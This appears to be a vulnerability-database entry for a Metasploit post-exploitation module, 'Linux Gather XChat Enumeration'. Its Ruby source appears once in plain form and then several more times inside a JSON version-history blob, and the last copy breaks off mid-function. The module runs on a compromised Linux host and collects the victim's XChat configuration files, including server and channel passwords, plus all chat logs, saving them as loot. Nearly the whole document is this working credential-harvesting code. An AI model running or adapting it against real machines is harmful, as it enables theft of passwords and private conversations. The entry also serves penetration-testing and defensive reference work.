ID MSF:POST/LINUX/GATHER/ENUM_XCHAT Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Gather XChat Enumeration',
'Description' => %q{
This module will collect XChat's config files and chat logs from the victim's
machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The
CONFIGS option can be used to collect information such as channel settings,
channel/server passwords, etc. The CHATS option will simply download all the
.log files.
},
'License' => MSF_LICENSE,
'Author' => ['sinn3r'],
'Platform' => ['linux'],
# linux meterpreter is too busted to support right now,
# will come back and add support once it's more usable.
'SessionTypes' => ['shell', 'meterpreter'],
'Actions' =>
[
['CONFIGS', { 'Description' => 'Collect XCHAT\'s config files' } ],
['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],
['ALL', { 'Description' => 'Collect both the plists and chat logs'}]
],
'DefaultAction' => 'ALL'
))
end
def get_file(file)
tries = 0
print_status("#{@peer} - Downloading #{file}")
begin
buf = read_file(file)
buf = '' if buf =~ /No such file or directory/
rescue ::Timeout::Error => e
tries += 1
if tries < 3
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
buf = ''
rescue EOFError => e
tries += 1
if tries < 3
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
buf = ''
end
return buf
end
def whoami
user = cmd_exec("/usr/bin/whoami").chomp
return user
end
def list_logs(base)
list = cmd_exec("ls -l #{base}*.log")
return [] if list =~ /No such file or directory/
files = list.scan(/\d+\x20\w{3}\x20\d+\x20\d{2}\:\d{2}\x20(.+)$/).flatten
return files
end
def save(type, data)
case type
when :configs
type = 'xchat.config'
when :chatlogs
type = 'xchat.chatlogs'
end
data.each do |d|
fname = ::File.basename(d[:filename])
p = store_loot(
type,
'text/plain',
session,
d[:data],
fname
)
print_good("#{@peer} - #{fname} saved as #{p}")
end
end
def get_chatlogs(base)
base << "xchatlogs/"
logs = []
list_logs(base).each do |l|
vprint_status("#{@peer} - Downloading: #{l}")
data = read_file(l)
logs << {
:filename => l,
:data => data
}
end
return logs
end
def get_configs(base)
config = []
files = ['servlist_.conf', 'xchat.conf']
files.each do |f|
vprint_status("#{@peer} - Downloading: #{base + f}")
buf = read_file(base + f)
next if buf.blank?
config << {
:filename => f,
:data => buf
}
end
return config
end
def run
if action.nil?
print_error("Please specify an action")
return
end
@peer = "#{session.session_host}:#{session.session_port}"
user = whoami
if user.blank?
print_error("#{@peer} - Unable to get username, abort.")
return
end
base = "/home/#{user}/.xchat2/"
configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i
chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i
save(:configs, configs) unless configs.empty?
save(:chatlogs, chatlogs) unless chatlogs.empty?
end
end
=begin
Linux xchat path:
/home/[username]/.xchat2/
* /home/[username]/.xchat2/servlist_.conf
* /home/[username]/.xchat2/xchat.conf
* /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log
=end
{"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "hash": "d2eafdba797c7c20dfacc0c58a9613f7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-22T15:34:20", "history": [{"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/post/linux/gather/enum_xchat", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:41:21", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\n\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-07-02T23:41:21", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/post/linux/gather/enum_xchat", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-24T19:31:25", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-07-24T19:31:25", "differentElements": ["href"], "edition": 2}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:39", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-08-21T15:32:39", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-21T07:42:40", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-10-21T07:42:40", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-22T03:44:44", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2017-10-22T03:44:44", "value": 3.6}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-10-22T03:44:44", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-31T06:01:29", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2017-12-31T06:01:29", "value": 3.6}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n 